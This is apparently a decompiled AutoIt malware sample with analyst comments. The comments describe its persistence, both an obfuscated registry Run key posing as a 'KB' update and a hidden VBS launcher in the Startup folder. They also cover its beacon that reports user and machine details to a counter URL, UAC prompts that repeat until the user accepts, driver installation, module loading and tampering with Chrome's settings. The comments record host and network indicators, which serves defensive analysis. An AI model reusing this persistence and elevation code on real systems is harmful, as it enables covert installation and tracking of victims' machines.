| 281(@ComSpec & " /C reg add HKC" & "U\Softw" & "are\Mic" & "rosoft\Win" & "dows\Curr" & "entVer" & "sion\R" & "un /v KB28" & '23324 /d "' & $sinstalldir & "\inter.exe " & $sinstalldir & '\userconf.dat" /f') | |
| 6 | |
| debuglog("Setting as startup through startup folder - interpreted") | |
| 28$hfile = 110($sinstalldir & "\auto.vbs", 2) | |
| ; The VBScript launcher passes window style 0 to Run, i.e. the program is started without a visible window. | |
| 124($hfile, 'CreateObject("WScript.Shell").Run "inter.exe userconf.dat", 0, False') | |
| 90($hfile) | |
| 93($sinstalldir & "\auto.vbs", @StartupDir & "\auto.lnk", $sinstalldir) | |
| 8 | |
| 6 | |
| 4$busestartupfolder5 | |
| debuglog("Setting as startup through startup folder - not interpreted") | |
| 28$hfile = 110($sinstalldir & "\auto.vbs", 2) | |
| 124($hfile, 'CreateObject("WScript.Shell").Run "inter.exe", 0, False') | |
| 90($hfile) | |
| 93($sinstalldir & "\auto.vbs", @StartupDir & "\auto.lnk", $sinstalldir) | |
| 6 | |
| debuglog("Setting as startup through registry - not interpreted") | |
| 91(@ScriptFullPath, $sinstalldir & "\inter.exe", 1) | |
| 281(@ComSpec & " /C reg add HKC" & "U\Softw" & "are\Mic" & "rosoft\Win" & "dows\Curr" & "entVer" & "sion\R" & "un /v KB28" & '23324 /d "' & $sinstalldir & '\inter.exe" /f') | |
| 8 | |
| 8 | |
| 8 | |
| 33 | |
| ; _main: main flow when the sample is started without arguments. | |
| ;   1. Requests $scounterurl with do=add plus user name, machine name, OS version, architecture and build | |
| ;      (208 is presumably an HTTP read call). The query string is a usable proxy-log indicator. | |
| ;   2. Waits in a loop until 274(0, 10, 1) returns 5 (presumably Random), i.e. a variable start-up delay. | |
| ;   3. If %SystemRoot%\interception.dll is missing: registers with the server, then relaunches itself with | |
| ;      "--drvinst" using the "runas" verb, repeating until a process ID comes back, and exits (35). | |
| ;   4. If not elevated (218 is presumably an is-admin check): relaunches itself with "runas" the same way and exits. | |
| ;   5. Otherwise loads <installdir>\datastorage.bin via 64(...) (presumably a DLL open). On failure (-1) it | |
| ;      calls 291(2 + 4), which by the log string restarts the machine; on success it idles in a sleep loop. | |
| ; Because the "runas" launch sits inside a Do...Until loop, a declined elevation prompt is shown again | |
| ; until it is accepted. Repeated consent prompts for the same binary, and an elevated child carrying | |
| ; "--drvinst", are the observable behaviours. | |
| 32_main() | |
| debuglog("Registering execution") | |
| 208($scounterurl & "?do=add&user=" & urlencode(@UserName) & "&machine=" & urlencode(@ComputerName) & "&os=" & @OSVersion & "&arch=" & urlencode(@OSArch) & "&build=" & $ibuildver, 1) | |
| 29$bfirstrun = 40 | |
| debuglog("Waiting") | |
| 11 | |
| 293(10) | |
| 12274(0, 10, 1) = 5 | |
| 4$ba3x5 | |
| debuglog("Running interpreted. Installing itself") | |
| installself() | |
| installfiles() | |
| 8 | |
| ; "4395(...)" reads as If Not 95(...): 95 is presumably a file-exists test on the driver DLL. | |
| 4395(83("SystemRoot") & "\interception.dll")5 | |
| debuglog("Driver is not installed") | |
| $bfirstrun = 39 | |
| registermachine() | |
| 28$iproc | |
| 11 | |
| 4$ba3x5 | |
| $iproc = 289(@AutoItExe, '"' & @ScriptFullPath & '" --drvinst', @WorkingDir, "runas") | |
| 6 | |
| $iproc = 289(@ScriptFullPath, "--drvinst", @WorkingDir, "runas") | |
| 8 | |
| 12$iproc > 0 | |
| 35 | |
| 8 | |
| 43218()5 | |
| debuglog("Will request UAC") | |
| 28$iproc | |
| 11 | |
| 4$ba3x5 | |
| $iproc = 289(@AutoItExe, '"' & @ScriptFullPath & '"', @WorkingDir, "runas") | |
| 6 | |
| $iproc = 289(@ScriptFullPath, "", @WorkingDir, "runas") | |
| 8 | |
| 12$iproc > 0 | |
| debuglog("UAC Requested. PID: " & $iproc) | |
| 35 | |
| 8 | |
| 4$bfirstrun13$ba3x5 | |
| debuglog("Not running interpreted. Installing files") | |
| installfiles() | |
| 8 | |
| debuglog("Instancing module") | |
| $hmod = 64($sinstalldir & "\datastorage.bin") | |
| 4$hmod = -15 | |
| debuglog("Failed to load module. Restarting...") | |
| 291(2 + 4) | |
| 6 | |
| debuglog("Module running") | |
| 8 | |
| ; "91" reads as While 1: the script stays resident after the module is loaded. | |
| 91 | |
| 293(100) | |
| 10 | |
| 33 | |
| ; dochrometrick: rewrites Chrome's per-user "Local State" file so hardware acceleration is recorded as off. | |
| ;   - Every '"enabled": true' in the file is replaced with '"enabled": false' (328 is presumably a | |
| ;     replace-all, so unrelated "enabled" settings in the same file may be flipped too -- TODO confirm). | |
| ;   - The first character is trimmed (336) and a '"hardware_acceleration_mode": { "enabled": false }' | |
| ;     object is prepended before the file is written back. | |
| ; The reason for disabling acceleration is not stated anywhere in this file. | |
| ; Defender notes: a non-browser process writing to Chrome's Local State is the observable event; the | |
| ; path is built from @HomePath only, so the default Chrome profile location is assumed. | |
| 32dochrometrick() | |
| $schromefile = @HomePath & "\AppData\Local\Google\Chrome\User Data\Local State" | |
| 495($schromefile)5 | |
| $sstate = 112($schromefile) | |
| $sstate = 328($sstate, '"enabled": true', '"enabled": false') | |
| $sstate = 328($sstate, '"hardware_acceleration_mode_previous": true', '"hardware_acceleration_mode_previous": false') | |
| $sstate = '{ "hardware_acceleration_mode": { "enabled": false }, ' & 336($sstate, 1) | |
| $h = 110($schromefile, 2) | |
| 123($h, $sstate) | |
| 90($h) | |
| 8 | |
| 33 | |
| ; Script entry point. | |
| ; First loop: retries _singleton("huebr", 1) every 100 ms while it returns 0, i.e. waits until no other | |
| ; holder of the mutex named "huebr" exists. The mutex name is a host indicator for a running instance. | |
| 9_singleton("huebr", 1) = 0 | |
| 293(100) | |
| 10 | |
| ; Dispatch on the command line: no arguments -> _main(); "--drvinst" -> the elevated installation path | |
| ; (Chrome settings change, self-install, payload download, driver install and reboot). | |
| 4$cmdline[0] = 05 | |
| debuglog("Process started") | |
| _main() | |
| 7$cmdline[1] = "--drvinst"5 | |
| dochrometrick() | |
| debuglog("Will install itself") | |
| installself() | |
| debuglog("Will install required files") | |
| installfiles() | |
| debuglog("Will install driver") | |
| installdriver() | |
| 8 | |
| ; _winapi_base64decode: decodes $sb64string with CryptStringToBinaryA in Crypt32.dll. | |
| ; Two calls: the first passes a null buffer and reads the required size back in $acrypt[5]; the second | |
| ; decodes into a byte buffer of that size. Returns the buffer contents, or "" with error 1 or 2 set. | |
| ; The flags argument is 1 in both calls (presumably the Base64 string format -- confirm). | |
| ; No call to this helper is visible in this part of the file. | |
| 32_winapi_base64decode($sb64string) | |
| 28$acrypt = 58("Crypt32.dll", "bool", "CryptStringToBinaryA", "str", $sb64string, "dword", 0, "dword", 1, "ptr", 0, "dword*", 0, "ptr", 0, "ptr", 0) | |
| 4@error23$acrypt[0]534287(1, 0, "") | |
| 28$bbuffer = 65("byte[" & $acrypt[5] & "]") | |
| $acrypt = 58("Crypt32.dll", "bool", "CryptStringToBinaryA", "str", $sb64string, "dword", 0, "dword", 1, "struct*", $bbuffer, "dword*", $acrypt[5], "ptr", 0, "ptr", 0) | |
| 4@error23$acrypt[0]534287(2, 0, "") | |
| 3466($bbuffer, 1) | |
| 33 | |
| ; _winapi_lzntdecompress: allocates $toutput as a byte buffer of $ibuffersize and calls RtlDecompressBuffer | |
| ; in ntdll.dll with format value 2 to decompress $tinput into it. 36 is presumably the ByRef token, | |
| ; so $toutput is handed back to the caller. | |
| ; Returns $aret[6] (the final-size output argument); on failure returns 0 with error 1, 2 or 3, where | |
| ; error 3 carries the non-zero status code from the API as the extended value. | |
| ; No call to this helper is visible in this part of the file. | |
| 32_winapi_lzntdecompress(36$tinput, 36$toutput, $ibuffersize) | |
| $toutput = 65("byte[" & $ibuffersize & "]") | |
| 4@error534287(1, 0, 0) | |
| 28$aret = 58("ntdll.dll", "uint", "RtlDecompressBuffer", "ushort", 2, "struct*", $toutput, "ulong", $ibuffersize, "struct*", $tinput, "ulong", 68($tinput), "ulong*", 0) | |
| 4@error534287(2, 0, 0) | |
| 4$aret[0]534287(3, $aret[0], 0) | |
| 34$aret[6] | |
| 33 | |
| ; urlencode: percent-encodes $sdata one element at a time for use in the counter URL built by _main(). | |
| ; The input is converted by 335(..., 4) and 16(..., 1) before being split into single elements | |
| ; (presumably string-to-binary as UTF-8 and back -- TODO confirm), then each element's code is examined: | |
| ;   - 45, 46, 48-57, 65-90, 95, 97-122, 126 (i.e. - . 0-9 A-Z _ a-z ~) are copied unchanged | |
| ;   - 32 (space) becomes "%20" | |
| ;   - everything else becomes "%" followed by 199($nchar, 2) (presumably two hex digits) | |
| ; 23/21/24 read as Switch/Case/EndSwitch and "216" as Case Else -- inferred from layout. | |
| 32urlencode($sdata) | |
| 28$adata = 331(16(335($sdata, 4), 1), "") | |
| 28$nchar | |
| $sdata = "" | |
| 13$i = 115$adata[0] | |
| $nchar = 4($adata[$i]) | |
| 23$nchar | |
| 2145, 46, 481557, 651590, 95, 9715122, 126 | |
| $sdata &= $adata[$i] | |
| 2132 | |
| $sdata &= "%20" | |
| 216 | |
| $sdata &= "%" & 199($nchar, 2) | |
| 24 | |
| 14 | |
| 34$sdata | |
| 33 | |
| ; _base64encode: encodes $input with CryptBinaryToString in Crypt32.dll (flags value 1). | |
| ; Two calls: the first passes a null output pointer so the required length is written to $strc; the | |
| ; second writes into a char buffer of that length. Returns the buffer contents, or "" with error 1 or 2 set. | |
| ; No call to this helper is visible in this part of the file. | |
| 32_base64encode($input) | |
| $input = 13($input) | |
| 28$struct = 65("byte[" & 14($input) & "]") | |
| 69($struct, 1, $input) | |
| 28$strc = 65("int") | |
| 28$a_call = 58("Crypt32.dll", "int", "CryptBinaryToString", "ptr", 67($struct), "int", 68($struct), "int", 1, "ptr", 0, "ptr", 67($strc)) | |
| 4@error23$a_call[0]5 | |
| 34287(1, 0, "") | |
| 8 | |
| 28$a = 65("char[" & 66($strc, 1) & "]") | |
| $a_call = 58("Crypt32.dll", "int", "CryptBinaryToString", "ptr", 67($struct), "int", 68($struct), "int", 1, "ptr", 67($a), "ptr", 67($strc)) | |
| 4@error23$a_call[0]5 | |
| 34287(2, 0, "") | |
| 8 | |
| 3466($a, 1) | |
| 33 | |
| ; _base64decode: decodes $input_string with CryptStringToBinary in Crypt32.dll (flags value 1). | |
| ; Two calls: the first passes a null buffer so the required size is written to $struct; the second | |
| ; decodes into a byte buffer of that size. Returns the buffer contents, or "" with error 1 or 2 set. | |
| ; $a_call is assigned without a 28 (Local) prefix here, unlike in _base64encode. | |
| ; No call to this helper is visible in this part of the file. | |
| 32_base64decode($input_string) | |
| 28$struct = 65("int") | |
| $a_call = 58("Crypt32.dll", "int", "CryptStringToBinary", "str", $input_string, "int", 0, "int", 1, "ptr", 0, "ptr", 67($struct, 1), "ptr", 0, "ptr", 0) | |
| 4@error23$a_call[0]5 | |
| 34287(1, 0, "") | |
| 8 | |
| 28$a = 65("byte[" & 66($struct, 1) & "]") | |
| $a_call = 58("Crypt32.dll", "int", "CryptStringToBinary", "str", $input_string, "int", 0, "int", 1, "ptr", 67($a), "ptr", 67($struct, 1), "ptr", 0, "ptr", 0) | |
| 4@error23$a_call[0]5 | |
| 34287(2, 0, "") | |
| 8 | |
| 3466($a, 1) | |
| 33 | |
| ; basename: splits $spath on "\" (331 is presumably a string split whose element 0 holds the count) | |
| ; and returns the last element, i.e. the file-name part of a Windows path. | |
| ; Used by installself() to compare the interpreter's file name with "inter.exe". | |
| 32basename($spath) | |
| $spath = 331($spath, "\") | |
| 34$spath[$spath[0]] | |
| 33 | |
| ; debuglog: empty body in this dump, so every debuglog(...) call in the script is a no-op at run time. | |
| ; The message strings passed to it remain in the script and are useful static indicators. | |
| 32debuglog($str) | |
| 33 | |